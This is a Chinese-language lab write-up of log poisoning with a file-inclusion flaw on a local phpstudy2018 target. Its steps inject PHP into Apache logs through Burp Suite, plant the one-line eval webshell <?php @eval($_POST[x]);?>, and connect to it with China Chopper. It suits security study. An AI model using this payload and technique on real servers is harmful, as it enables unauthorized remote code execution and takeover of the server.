此实验中用的是phpstudy2018
靶机IP地址:192.168.212.131

一、前提条件

phpstudy中日志功能默认关闭,得手动修改配置文件开启apache日志功能
文件包含漏洞——配合日志文件
重启phpstudy,访问日志文件存在
文件包含漏洞——配合日志文件

二、文件包含漏洞测试

第一步:输入<?php phpinfo();?>进行测试
文件包含漏洞——配合日志文件
利用文件包含漏洞查看各个输入的内容是否存在与日志文件内
文件包含漏洞——配合日志文件
发现<?php phpinfo();?>已被转义成%3C?php%20phpinfo();?%3E
第二步:既然被转移,那就结合burpsuite抓包修改
开启burpsuite抓包,输入<?php phpinfo();?>继续进行测试
文件包含漏洞——配合日志文件
拦包修改被转义的内容
文件包含漏洞——配合日志文件
文件包含漏洞——配合日志文件
修改之后放包,再去文件包含日志文件,发现<?php phpinfo();?>已被执行
文件包含漏洞——配合日志文件

三、文件包含漏洞利用

第一步:输入一句话木马<?php @eval($_POST[x]);?>
文件包含漏洞——配合日志文件
拦包修改被转义的内容
文件包含漏洞——配合日志文件
文件包含漏洞——配合日志文件
第二步:访问日志文件,查看没有一句话木马内容,说明一句话木马被当作php语言正常解析运行了
文件包含漏洞——配合日志文件
第三步:中国菜刀连接木马文件
文件包含漏洞——配合日志文件
添加成功之后,双击查看,成功连接木马文件
文件包含漏洞——配合日志文件

相关文章: